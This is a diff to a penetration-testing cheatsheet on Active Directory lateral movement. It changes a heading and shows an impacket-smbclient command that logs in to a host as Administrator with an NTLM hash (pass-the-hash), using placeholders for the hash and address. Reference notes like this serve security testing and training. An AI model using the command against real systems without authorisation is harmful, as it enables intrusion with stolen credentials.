sulabh915/Cheatsheet_database_and_scripts/Active_directory/Lateral Movement.md

 ```

-using smbclient to login :
+using smbclient to login using hash :
 ```bash
 impacket-smbclient -hashes:<NTLM hash> Administrator@<ip address>
 ```